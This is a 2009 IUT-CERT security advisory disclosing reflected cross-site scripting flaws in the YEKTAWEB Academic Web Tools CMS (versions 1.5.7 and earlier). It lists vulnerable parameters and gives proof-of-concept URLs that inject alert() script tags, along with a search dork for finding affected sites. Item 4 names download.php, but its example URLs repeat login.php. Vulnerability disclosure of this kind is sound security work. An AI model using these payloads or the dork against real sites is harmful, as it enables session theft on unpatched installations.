YEKTA WEB Academic Web Tools CMS Multiple XSS

Mon, 02 Mar 2009 09:22:08 -0800 

============================================ IUT-CERT 
============================================



 Title: Academic Web Tools CMS Multiple XSS

 Vendor: www.yektaweb.com

 Vulnerable Version: 1.5.7 and priors

 Type: XSS

 Fix: N/A

 Dork: AWT YEKTA



============================================  nsec.ir 
============================================



Description:

------------------



        YEKTAWEB Academic Web Tools is a Persian Content Management System 
(CMS) for managing university

        affairs such as conferences, journals and etc.

    The built-in filter of this package can not prevent XSS attack on some 
parameters.







Vulnerabilities:

------------------



        1- Cross Site Scripting (XSS) in "/page.php" in "sid","logincase" and 
"redirect" parameters.

        http://yoursite/page.php?sid=[XSS]

        http://yoursite/page.php?logincase=[XSS]

        http://yoursite/page.php?redirect=[XSS]

        

        2- Cross Site Scripting (XSS) in "/page_arch.php" in "sid","logincase" 
and "redirect" parameters.

        http://yoursite/page_arch.php?sid=[XSS]

        http://yoursite/page_arch.php?logincase=[XSS]

        http://yoursite/page_arch.php?redirect=[XSS]





        3- Cross Site Scripting (XSS) in "/login.php" in "sid" ,"logincase" and 
"redirect" parameters.

        http://yoursite/login.php?sid=[XSS]

        http://yoursite/login.php?logincase=[XSS]

        http://yoursite/login.php?redirect=[XSS]



        4- Cross Site Scripting (XSS) in "/download.php" in "sid" ,"logincase" 
and "redirect" parameters.

        http://yoursite/login.php?sid=[XSS]

        http://yoursite/login.php?logincase=[XSS]

        http://yoursite/login.php?redirect=[XSS]





Exploit/PoC:

------------------





Example: 

                
http://yoursite/login.php?slct_pg_id=53&sid=1*/--></script><script>alert(188017)</script>&slc_lang=fa

                
http://yoursite/page_arch.php?slc_lang=fa&sid=1&logincase=*/--></script><script>alert(188017)</script>

                
http://yoursite/page.php?sid=1&slc_lang=en&redirect=*/--></script><script>alert(188017)</script>





Solution:

------------------



                Input Validation Filter should be patched.





Credit: 

------------------

Isfahan University of Technology - Computer Emergency Response Team

Thanks to : M. R. Faghani, N. Fathi, E. Aerabi, E. Jafari

Reply via email to